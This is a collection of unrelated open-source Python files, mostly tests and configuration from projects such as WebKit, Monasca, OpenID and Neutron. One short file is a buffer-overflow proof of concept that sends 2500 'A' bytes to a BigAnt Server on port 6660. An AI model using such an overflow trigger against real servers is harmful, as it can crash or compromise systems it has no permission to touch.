# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['substitutions.rst', ]
|
eriol/pywt
|
doc/source/conf.py
|
Python
|
mit
| 7,140
|
# Copyright (C) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import tempfile
import unittest
from webkitpy.common.net.credentials import Credentials
from webkitpy.common.system.executive import Executive
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.common.system.user_mock import MockUser
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.mocktool import MockOptions
from webkitpy.common.system.executive_mock import MockExecutive
# FIXME: Other unit tests probably want this class.
class _TemporaryDirectory(object):
def __init__(self, **kwargs):
self._kwargs = kwargs
self._directory_path = None
def __enter__(self):
self._directory_path = tempfile.mkdtemp(**self._kwargs)
return self._directory_path
def __exit__(self, type, value, traceback):
os.rmdir(self._directory_path)
# Note: All tests should use this class instead of Credentials directly to avoid using a real Executive.
class MockedCredentials(Credentials):
def __init__(self, *args, **kwargs):
if 'executive' not in kwargs:
kwargs['executive'] = MockExecutive()
Credentials.__init__(self, *args, **kwargs)
class CredentialsTest(unittest.TestCase):
example_security_output = """keychain: "/Users/test/Library/Keychains/login.keychain"
class: "inet"
attributes:
0x00000007 <blob>="bugs.webkit.org (test@webkit.org)"
0x00000008 <blob>=<NULL>
"acct"<blob>="test@webkit.org"
"atyp"<blob>="form"
"cdat"<timedate>=0x32303039303832353233353231365A00 "20090825235216Z\000"
"crtr"<uint32>=<NULL>
"cusi"<sint32>=<NULL>
"desc"<blob>="Web form password"
"icmt"<blob>="default"
"invi"<sint32>=<NULL>
"mdat"<timedate>=0x32303039303930393137323635315A00 "20090909172651Z\000"
"nega"<sint32>=<NULL>
"path"<blob>=<NULL>
"port"<uint32>=0x00000000
"prot"<blob>=<NULL>
"ptcl"<uint32>="htps"
"scrp"<sint32>=<NULL>
"sdmn"<blob>=<NULL>
"srvr"<blob>="bugs.webkit.org"
"type"<uint32>=<NULL>
password: "SECRETSAUCE"
"""
def test_keychain_lookup_on_non_mac(self):
class FakeCredentials(MockedCredentials):
def _is_mac_os_x(self):
return False
credentials = FakeCredentials("bugs.webkit.org")
self.assertEqual(credentials._is_mac_os_x(), False)
self.assertEqual(credentials._credentials_from_keychain("foo"), ["foo", None])
def test_security_output_parse(self):
credentials = MockedCredentials("bugs.webkit.org")
self.assertEqual(credentials._parse_security_tool_output(self.example_security_output), ["test@webkit.org", "SECRETSAUCE"])
def test_security_output_parse_entry_not_found(self):
# FIXME: This test won't work if the user has a credential for foo.example.com!
credentials = Credentials("foo.example.com")
if not credentials._is_mac_os_x():
return # This test does not run on a non-Mac.
# Note, we ignore the captured output because it is already covered
# by the test case CredentialsTest._assert_security_call (below).
outputCapture = OutputCapture()
outputCapture.capture_output()
self.assertEqual(credentials._run_security_tool(), None)
outputCapture.restore_output()
def _assert_security_call(self, username=None):
executive_mock = Mock()
credentials = MockedCredentials("example.com", executive=executive_mock)
expected_stderr = "Reading Keychain for example.com account and password. Click \"Allow\" to continue...\n"
OutputCapture().assert_outputs(self, credentials._run_security_tool, [username], expected_stderr=expected_stderr)
security_args = ["/usr/bin/security", "find-internet-password", "-g", "-s", "example.com"]
if username:
security_args += ["-a", username]
executive_mock.run_command.assert_called_with(security_args)
def test_security_calls(self):
self._assert_security_call()
self._assert_security_call(username="foo")
def test_credentials_from_environment(self):
credentials = MockedCredentials("example.com")
saved_environ = os.environ.copy()
os.environ['WEBKIT_BUGZILLA_USERNAME'] = "foo"
os.environ['WEBKIT_BUGZILLA_PASSWORD'] = "bar"
username, password = credentials._credentials_from_environment()
self.assertEqual(username, "foo")
self.assertEqual(password, "bar")
os.environ = saved_environ
def test_read_credentials_without_git_repo(self):
# FIXME: This should share more code with test_keyring_without_git_repo
class FakeCredentials(MockedCredentials):
def _is_mac_os_x(self):
return True
def _credentials_from_keychain(self, username):
return ("test@webkit.org", "SECRETSAUCE")
def _credentials_from_environment(self):
return (None, None)
with _TemporaryDirectory(suffix="not_a_git_repo") as temp_dir_path:
credentials = FakeCredentials("bugs.webkit.org", cwd=temp_dir_path)
# FIXME: Using read_credentials here seems too broad as higher-priority
# credential source could be affected by the user's environment.
self.assertEqual(credentials.read_credentials(), ("test@webkit.org", "SECRETSAUCE"))
def test_keyring_without_git_repo(self):
# FIXME: This should share more code with test_read_credentials_without_git_repo
class MockKeyring(object):
def get_password(self, host, username):
return "NOMNOMNOM"
class FakeCredentials(MockedCredentials):
def _is_mac_os_x(self):
return True
def _credentials_from_keychain(self, username):
return ("test@webkit.org", None)
def _credentials_from_environment(self):
return (None, None)
with _TemporaryDirectory(suffix="not_a_git_repo") as temp_dir_path:
credentials = FakeCredentials("fake.hostname", cwd=temp_dir_path, keyring=MockKeyring())
# FIXME: Using read_credentials here seems too broad as higher-priority
# credential source could be affected by the user's environment.
self.assertEqual(credentials.read_credentials(), ("test@webkit.org", "NOMNOMNOM"))
def test_keyring_without_git_repo_nor_keychain(self):
class MockKeyring(object):
def get_password(self, host, username):
return "NOMNOMNOM"
class FakeCredentials(MockedCredentials):
def _credentials_from_keychain(self, username):
return (None, None)
def _credentials_from_environment(self):
return (None, None)
class FakeUser(MockUser):
@classmethod
def prompt(cls, message, repeat=1, raw_input=raw_input):
return "test@webkit.org"
@classmethod
def prompt_password(cls, message, repeat=1, raw_input=raw_input):
raise AssertionError("should not prompt for password")
with _TemporaryDirectory(suffix="not_a_git_repo") as temp_dir_path:
credentials = FakeCredentials("fake.hostname", cwd=temp_dir_path, keyring=MockKeyring())
# FIXME: Using read_credentials here seems too broad as higher-priority
# credential source could be affected by the user's environment.
self.assertEqual(credentials.read_credentials(FakeUser), ("test@webkit.org", "NOMNOMNOM"))
if __name__ == '__main__':
unittest.main()
|
leighpauls/k2cro4
|
third_party/WebKit/Tools/Scripts/webkitpy/common/net/credentials_unittest.py
|
Python
|
bsd-3-clause
| 9,141
|
""" Course API """
from openedx.core.djangoapps.waffle_utils import WaffleSwitch, WaffleSwitchNamespace
WAFFLE_SWITCH_NAMESPACE = WaffleSwitchNamespace(name='course_list_api_rate_limit')
USE_RATE_LIMIT_2_FOR_COURSE_LIST_API = WaffleSwitch(WAFFLE_SWITCH_NAMESPACE, 'rate_limit_2')
USE_RATE_LIMIT_10_FOR_COURSE_LIST_API = WaffleSwitch(WAFFLE_SWITCH_NAMESPACE, 'rate_limit_10')
|
edx-solutions/edx-platform
|
lms/djangoapps/course_api/__init__.py
|
Python
|
agpl-3.0
| 379
|
# Copyright 2016-2017 FUJITSU LIMITED
# Copyright 2018 OP5 AB
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from falcon import testing
from monasca_common.policy import policy_engine as policy
from oslo_context import context
from oslo_policy import policy as os_policy
from monasca_log_api.app.base import request
from monasca_log_api.policies import roles_list_to_check_str
from monasca_log_api.tests import base
class TestPolicyFileCase(base.BaseTestCase):
def setUp(self):
super(TestPolicyFileCase, self).setUp()
self.context = context.RequestContext(user='fake',
tenant='fake',
roles=['fake'])
self.target = {'tenant_id': 'fake'}
def test_modified_policy_reloads(self):
tmp_file = \
self.create_tempfiles(files=[('policies', '{}')], ext='.yaml')[0]
base.BaseTestCase.conf_override(policy_file=tmp_file,
group='oslo_policy')
policy.reset()
policy.init()
action = 'example:test'
rule = os_policy.RuleDefault(action, '')
policy._ENFORCER.register_defaults([rule])
with open(tmp_file, 'w') as policy_file:
policy_file.write('{"example:test": ""}')
policy.authorize(self.context, action, self.target)
with open(tmp_file, 'w') as policy_file:
policy_file.write('{"example:test": "!"}')
policy._ENFORCER.load_rules(True)
self.assertRaises(os_policy.PolicyNotAuthorized, policy.authorize,
self.context, action, self.target)
class TestPolicyCase(base.BaseTestCase):
def setUp(self):
super(TestPolicyCase, self).setUp()
rules = [
os_policy.RuleDefault("true", "@"),
os_policy.RuleDefault("example:allowed", "@"),
os_policy.RuleDefault("example:denied", "!"),
os_policy.RuleDefault("example:lowercase_monasca_user",
"role:monasca_user or role:sysadmin"),
os_policy.RuleDefault("example:uppercase_monasca_user",
"role:MONASCA_USER or role:sysadmin"),
]
policy.reset()
policy.init()
policy._ENFORCER.register_defaults(rules)
def test_authorize_nonexist_action_throws(self):
action = "example:noexist"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
self.assertRaises(os_policy.PolicyNotRegistered, policy.authorize,
ctx.context, action, {})
def test_authorize_bad_action_throws(self):
action = "example:denied"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
self.assertRaises(os_policy.PolicyNotAuthorized, policy.authorize,
ctx.context, action, {})
def test_authorize_bad_action_no_exception(self):
action = "example:denied"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
result = policy.authorize(ctx.context, action, {}, False)
self.assertFalse(result)
def test_authorize_good_action(self):
action = "example:allowed"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
result = policy.authorize(ctx.context, action, {}, False)
self.assertTrue(result)
def test_ignore_case_role_check(self):
lowercase_action = "example:lowercase_monasca_user"
uppercase_action = "example:uppercase_monasca_user"
monasca_user_context = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "monasca_user",
"X_PROJECT_ID": "fake",
"X_ROLES": "MONASCA_user"
}
)
)
self.assertTrue(policy.authorize(monasca_user_context.context,
lowercase_action,
{}))
self.assertTrue(policy.authorize(monasca_user_context.context,
uppercase_action,
{}))
class RegisteredPoliciesTestCase(base.BaseTestCase):
def __init__(self, *args, **kwds):
super(RegisteredPoliciesTestCase, self).__init__(*args, **kwds)
self.default_roles = ['monasca-user', 'admin']
def test_healthchecks_policies_roles(self):
healthcheck_policies = {
'log_api:healthcheck:head': ['any_role'],
'log_api:healthcheck:get': ['any_role']
}
self._assert_rules(healthcheck_policies)
def test_versions_policies_roles(self):
versions_policies = {
'log_api:versions:get': ['any_role']
}
self._assert_rules(versions_policies)
def test_logs_policies_roles(self):
logs_policies = {
'log_api:logs:post': self.default_roles
}
self._assert_rules(logs_policies)
def _assert_rules(self, policies_list):
for policy_name in policies_list:
registered_rule = policy.get_rules()[policy_name]
if hasattr(registered_rule, 'rules'):
self.assertEqual(len(registered_rule.rules),
len(policies_list[policy_name]))
for role in policies_list[policy_name]:
ctx = self._get_request_context(role)
self.assertTrue(policy.authorize(ctx.context,
policy_name,
{})
)
@staticmethod
def _get_request_context(role):
return request.Request(
testing.create_environ(
path='/',
headers={'X_ROLES': role}
)
)
class PolicyUtilsTestCase(base.BaseTestCase):
def test_roles_list_to_check_str(self):
self.assertEqual(roles_list_to_check_str(['test_role']), 'role:test_role')
self.assertEqual(roles_list_to_check_str(['role1', 'role2', 'role3']),
'role:role1 or role:role2 or role:role3')
self.assertEqual(roles_list_to_check_str(['@']), '@')
self.assertEqual(roles_list_to_check_str(['role1', '@', 'role2']),
'role:role1 or @ or role:role2')
self.assertIsNone(roles_list_to_check_str(None))
|
stackforge/monasca-log-api
|
monasca_log_api/tests/test_policy.py
|
Python
|
apache-2.0
| 7,850
|
#exp1
#!/usr/bin/python
import socket
target_address="127.0.0.1"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
|
onedal88/Exploits-1
|
BigAnt Server 2.52 SP5/exp/exp1.py
|
Python
|
gpl-3.0
| 282
|
# -*- coding: utf-8 -*-
__author__ = 'Alan Tai'
'''
Created on Jun 24, 2014
@author: Alan Tai
'''
import logging
import jinja2
import webapp2
import json
from dictionaries.dict_keys_values import KeysVaulesGeneral
from handlers.handler_webapp2_extra_auth import BaseHandler
from models.models_video_info import VideoInfo
# dictionaries
dict_general = KeysVaulesGeneral()
# jinja environment
jinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader('static/templates'))
# dispatchers
class VideosDataUploadDispatcher(BaseHandler):
def post(self):
""" handler of dealing with geo info update """
if self._is_json(self.request.get('video_data')):
json_article_data = json.loads(self.request.get('video_data'))
for elem in json_article_data:
query = VideoInfo.query(VideoInfo.id == elem["id"])
if (query.count() == 0):
new_video = VideoInfo()
new_video.id = elem["id"]
new_video.sys_id = elem["sys_id"]
new_video.title = elem["title"]
new_video.description = elem["description"]
new_video.publishedAt = elem["publishedAt"]
new_video.thumbnails = elem["thumbnails"]
new_video.put()
status = 'success'
else:
status = 'received variable is not in JSON format'
# ajax response
ajax_response = {'status': status}
self.response.out.headers['Content-Type'] = 'text/json'
self.response.out.write(json.dumps(ajax_response))
# check if variable is in json format
def _is_json(self, arg_json):
try:
json.loads(arg_json)
except ValueError:
return False
return True
# configuration
config = dict_general.config_setting
# app
app = webapp2.WSGIApplication([
webapp2.Route(r'/videos/videos_info_handler', VideosDataUploadDispatcher, name='articles_info_handler')
], debug=True, config=config)
# log
logging.getLogger().setLevel(logging.DEBUG)
from google.appengine.ext import ndb
|
Gogistics/prjTWPublicMovements
|
prjUnlimitedKP/src/dispatchers/dispatchers_videos.py
|
Python
|
apache-2.0
| 2,200
|
import odoo.tests
class TestUi(odoo.tests.HttpCase):
post_install = True
at_install = False
def test_01_admin_widget_x2many(self):
self.phantom_js("/web#action=test_new_api.action_discussions",
"odoo.__DEBUG__.services['web_tour.tour'].run('widget_x2many', 100)",
"odoo.__DEBUG__.services['web_tour.tour'].tours.widget_x2many.ready",
login="admin", timeout=120)
|
chienlieu2017/it_management
|
odoo/odoo/addons/test_new_api/tests/test_ui.py
|
Python
|
gpl-3.0
| 456
|
from django.db import models
class FileMixin(models.Model):
class Meta:
abstract = True
ordering = ('-created_at', '-modified_at', 'title')
def __str__(self):
return self.title
def get_absolute_url(self):
return self.file.url
def save(self, *args, **kwargs):
# Avoid doing file size requests constantly
self.file_size = self.file.size
super().save(*args, **kwargs)
|
developersociety/django-glitter
|
glitter/assets/mixins.py
|
Python
|
bsd-3-clause
| 443
|
import unittest
from openid.yadis import services, etxrd, xri
import os.path
def datapath(filename):
module_directory = os.path.dirname(os.path.abspath(__file__))
return os.path.join(module_directory, 'data', 'test_etxrd', filename)
XRD_FILE = datapath('valid-populated-xrds.xml')
NOXRDS_FILE = datapath('not-xrds.xml')
NOXRD_FILE = datapath('no-xrd.xml')
# None of the namespaces or service URIs below are official (or even
# sanctioned by the owners of that piece of URL-space)
LID_2_0 = "http://lid.netmesh.org/sso/2.0b5"
TYPEKEY_1_0 = "http://typekey.com/services/1.0"
def simpleOpenIDTransformer(endpoint):
"""Function to extract information from an OpenID service element"""
if 'http://openid.net/signon/1.0' not in endpoint.type_uris:
return None
delegates = list(endpoint.service_element.findall(
'{http://openid.net/xmlns/1.0}Delegate'))
assert len(delegates) == 1
delegate = delegates[0].text
return (endpoint.uri, delegate)
class TestServiceParser(unittest.TestCase):
def setUp(self):
self.xmldoc = file(XRD_FILE).read()
self.yadis_url = 'http://unittest.url/'
def _getServices(self, flt=None):
return list(services.applyFilter(self.yadis_url, self.xmldoc, flt))
def testParse(self):
"""Make sure that parsing succeeds at all"""
services = self._getServices()
def testParseOpenID(self):
"""Parse for OpenID services with a transformer function"""
services = self._getServices(simpleOpenIDTransformer)
expectedServices = [
("http://www.myopenid.com/server", "http://josh.myopenid.com/"),
("http://www.schtuff.com/openid", "http://users.schtuff.com/josh"),
("http://www.livejournal.com/openid/server.bml",
"http://www.livejournal.com/users/nedthealpaca/"),
]
it = iter(services)
for (server_url, delegate) in expectedServices:
for (actual_url, actual_delegate) in it:
self.failUnlessEqual(server_url, actual_url)
self.failUnlessEqual(delegate, actual_delegate)
break
else:
self.fail('Not enough services found')
def _checkServices(self, expectedServices):
"""Check to make sure that the expected services are found in
that order in the parsed document."""
it = iter(self._getServices())
for (type_uri, uri) in expectedServices:
for service in it:
if type_uri in service.type_uris:
self.failUnlessEqual(service.uri, uri)
break
else:
self.fail('Did not find %r service' % (type_uri,))
def testGetSeveral(self):
"""Get some services in order"""
expectedServices = [
# type, URL
(TYPEKEY_1_0, None),
(LID_2_0, "http://mylid.net/josh"),
]
self._checkServices(expectedServices)
def testGetSeveralForOne(self):
"""Getting services for one Service with several Type elements."""
types = [ 'http://lid.netmesh.org/sso/2.0b5'
, 'http://lid.netmesh.org/2.0b5'
]
uri = "http://mylid.net/josh"
for service in self._getServices():
if service.uri == uri:
found_types = service.matchTypes(types)
if found_types == types:
break
else:
self.fail('Did not find service with expected types and uris')
def testNoXRDS(self):
"""Make sure that we get an exception when an XRDS element is
not present"""
self.xmldoc = file(NOXRDS_FILE).read()
self.failUnlessRaises(
etxrd.XRDSError,
services.applyFilter, self.yadis_url, self.xmldoc, None)
def testEmpty(self):
"""Make sure that we get an exception when an XRDS element is
not present"""
self.xmldoc = ''
self.failUnlessRaises(
etxrd.XRDSError,
services.applyFilter, self.yadis_url, self.xmldoc, None)
def testNoXRD(self):
"""Make sure that we get an exception when there is no XRD
element present."""
self.xmldoc = file(NOXRD_FILE).read()
self.failUnlessRaises(
etxrd.XRDSError,
services.applyFilter, self.yadis_url, self.xmldoc, None)
class TestCanonicalID(unittest.TestCase):
def mkTest(iname, filename, expectedID):
"""This function builds a method that runs the CanonicalID
test for the given set of inputs"""
filename = datapath(filename)
def test(self):
xrds = etxrd.parseXRDS(file(filename).read())
self._getCanonicalID(iname, xrds, expectedID)
return test
test_delegated = mkTest(
"@ootao*test1", "delegated-20060809.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_delegated_r1 = mkTest(
"@ootao*test1", "delegated-20060809-r1.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_delegated_r2 = mkTest(
"@ootao*test1", "delegated-20060809-r2.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_sometimesprefix = mkTest(
"@ootao*test1", "sometimesprefix.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_prefixsometimes = mkTest(
"@ootao*test1", "prefixsometimes.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_spoof1 = mkTest("=keturn*isDrummond", "spoof1.xrds", etxrd.XRDSFraud)
test_spoof2 = mkTest("=keturn*isDrummond", "spoof2.xrds", etxrd.XRDSFraud)
test_spoof3 = mkTest("@keturn*is*drummond", "spoof3.xrds", etxrd.XRDSFraud)
test_status222 = mkTest("=x", "status222.xrds", None)
test_iri_auth_not_allowed = mkTest(
"phreak.example.com", "delegated-20060809-r2.xrds", etxrd.XRDSFraud)
test_iri_auth_not_allowed.__doc__ = \
"Don't let IRI authorities be canonical for the GCS."
# TODO: Refs
# test_ref = mkTest("@ootao*test.ref", "ref.xrds", "@!BAE.A650.823B.2475")
# TODO: Add a IRI authority with an IRI canonicalID.
# TODO: Add test cases with real examples of multiple CanonicalIDs
# somewhere in the resolution chain.
def _getCanonicalID(self, iname, xrds, expectedID):
if isinstance(expectedID, (str, unicode, type(None))):
cid = etxrd.getCanonicalID(iname, xrds)
self.failUnlessEqual(cid, expectedID and xri.XRI(expectedID))
elif issubclass(expectedID, etxrd.XRDSError):
self.failUnlessRaises(expectedID, etxrd.getCanonicalID,
iname, xrds)
else:
self.fail("Don't know how to test for expected value %r"
% (expectedID,))
if __name__ == '__main__':
unittest.main()
|
wtanaka/google-app-engine-django-openid
|
src/openid/test/test_etxrd.py
|
Python
|
gpl-3.0
| 6,886
|
#!/usr/bin/env python
# Aid tools to quality checker.
# Qchecklib
# Eliane Araujo, 2016
import os
import sys
import commands
import json
try:
from cc import measure_complexity
except ImportError:
print("tst quality checker needs cc.py to work.")
sys.exit(1)
try:
sys.path.append('/usr/local/bin/radon/')
from radon.raw import *
from radon.complexity import *
from radon.metrics import *
except ImportError:
print("tst quality checker needs radon to work.")
sys.exit(1)
try:
import urllib.request as urlrequest
except ImportError:
import urllib as urlrequest
url = 'http://qchecklog.appspot.com/api/action/'
def four_metrics(program_name):
return "%s %s %s %s" % ( lloc(program_name), cc(program_name), vhalstead(program_name), pep8(program_name)["count"])
def pep8count(program):
return int(pep8(program)[0])
def pep8(program):
result = []
cmd = 'pycodestyle.py --select=E --count ' + program
try:
pep_errors = commands.getoutput(cmd)
except ImportError:
print("tst quality checker needs pycodestyle.py to work.")
sys.exit(1)
if pep_errors:
for error in pep_errors.splitlines():
if error.isdigit():
result.insert(0, int(error))
break
#remove filename from message.
#Example:
#reference.py:15:16: E225 missing whitespace around operator
result.append( error[error.find(":") + 1:] )
else:
result = [0]
return result
def header_lines(filename):
# Count header's lines
# Consider "coding" and "env" as header
program = open(filename, 'r')
code = program.read()
counter = 0
codelines = code.split("\n")
while codelines[counter].startswith("#"):
counter += 1
program.close()
return counter
def vhalstead(filename):
return halstead_metrics("vol", filename)
def halstead_metrics(options, filename):
#It may be used another options
program = open(filename, 'r')
code = program.read()
if options == 'vol':
h = h_visit(code).volume
else:
h = h_visit(code)
program.close()
return round(h, 2)
def cc(filename):
# Radon complexity method only applies to programs containing classes or functions.
# Using another API to other cases.
program = open(filename, 'r')
code = program.read()
try:
# Use radon
visitor = cc_visit(code)
if len(visitor) <= 0:
# Doesn't have functions or classes.
# Use cc.py
stats = measure_complexity(code)
cc = stats.complexity
else:
cc = 0
for i in range( len(visitor) ):
cc += visitor[i].complexity
except Exception as e:
# Failed
print("qcheck: unable to get cc")
cc = 0
program.close()
return cc
def lloc(filename):
program = open(filename, 'r')
code = program.read()
lines = raw_metrics(code)[1]
program.close()
return lines
def raw_metrics(code):
return analyze(code)
def save(message):
type_ = 'accept'
urlrequest.urlopen(url + type_, data=message)
if __name__ == '__main__':
print("qchecklib is a helper module for tst_qcheck commands")
|
elianearaujo/tst-qcheck
|
bin/qchecklib.py
|
Python
|
agpl-3.0
| 3,348
|
import pytest
class TestHping3:
@pytest.mark.complete("hping3 ")
def test_1(self, completion):
assert completion
|
algorythmic/bash-completion
|
test/t/test_hping3.py
|
Python
|
gpl-2.0
| 131
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.v3 import test_servers
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class ConsoleOutputSampleJsonTest(test_servers.ServersSampleBase):
extension_name = "os-console-output"
extra_extensions_to_load = ["os-access-ips"]
_api_version = 'v2'
def _get_flags(self):
f = super(ConsoleOutputSampleJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.console_output.'
'Console_output')
return f
def test_get_console_output(self):
uuid = self._post_server()
response = self._do_post('servers/%s/action' % uuid,
'console-output-post-req', {})
subs = self._get_regexes()
self._verify_response('console-output-post-resp', subs, response, 200)
|
takeshineshiro/nova
|
nova/tests/functional/v3/test_console_output.py
|
Python
|
apache-2.0
| 1,656
|
# Copyright 2012 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sumit Naiksatam, Cisco Systems, Inc.
import abc
import inspect
import six
@six.add_metaclass(abc.ABCMeta)
class L2DevicePluginBase(object):
"""Base class for a device-specific plugin.
An example of a device-specific plugin is a Nexus switch plugin.
The network model relies on device-category-specific plugins to perform
the configuration on each device.
"""
@abc.abstractmethod
def create_network(self, tenant_id, net_name, net_id, vlan_name, vlan_id,
**kwargs):
"""Create network.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def delete_network(self, tenant_id, net_id, **kwargs):
"""Delete network.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def update_network(self, tenant_id, net_id, name, **kwargs):
"""Update network.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def create_port(self, tenant_id, net_id, port_state, port_id, **kwargs):
"""Create port.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def delete_port(self, tenant_id, net_id, port_id, **kwargs):
"""Delete port.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def update_port(self, tenant_id, net_id, port_id, **kwargs):
"""Update port.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def plug_interface(self, tenant_id, net_id, port_id, remote_interface_id,
**kwargs):
"""Plug interface.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def unplug_interface(self, tenant_id, net_id, port_id, **kwargs):
"""Unplug interface.
:returns:
:raises:
"""
pass
def create_subnet(self, tenant_id, net_id, ip_version,
subnet_cidr, **kwargs):
"""Create subnet.
:returns:
:raises:
"""
pass
def get_subnets(self, tenant_id, net_id, **kwargs):
"""Get subnets.
:returns:
:raises:
"""
pass
def get_subnet(self, tenant_id, net_id, subnet_id, **kwargs):
"""Get subnet.
:returns:
:raises:
"""
pass
def update_subnet(self, tenant_id, net_id, subnet_id, **kwargs):
"""Update subnet.
:returns:
:raises:
"""
pass
def delete_subnet(self, tenant_id, net_id, subnet_id, **kwargs):
"""Delete subnet.
:returns:
:raises:
"""
pass
@classmethod
def __subclasshook__(cls, klass):
"""Check plugin class.
The __subclasshook__ method is a class method
that will be called every time a class is tested
using issubclass(klass, Plugin).
In that case, it will check that every method
marked with the abstractmethod decorator is
provided by the plugin class.
"""
if cls is L2DevicePluginBase:
for method in cls.__abstractmethods__:
method_ok = False
for base in klass.__mro__:
if method in base.__dict__:
fn_obj = base.__dict__[method]
if inspect.isfunction(fn_obj):
abstract_fn_obj = cls.__dict__[method]
arg_count = fn_obj.func_code.co_argcount
expected_arg_count = \
abstract_fn_obj.func_code.co_argcount
method_ok = arg_count == expected_arg_count
if method_ok:
continue
return NotImplemented
return True
return NotImplemented
|
shakamunyi/neutron-vrrp
|
neutron/plugins/cisco/l2device_plugin_base.py
|
Python
|
apache-2.0
| 4,551
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
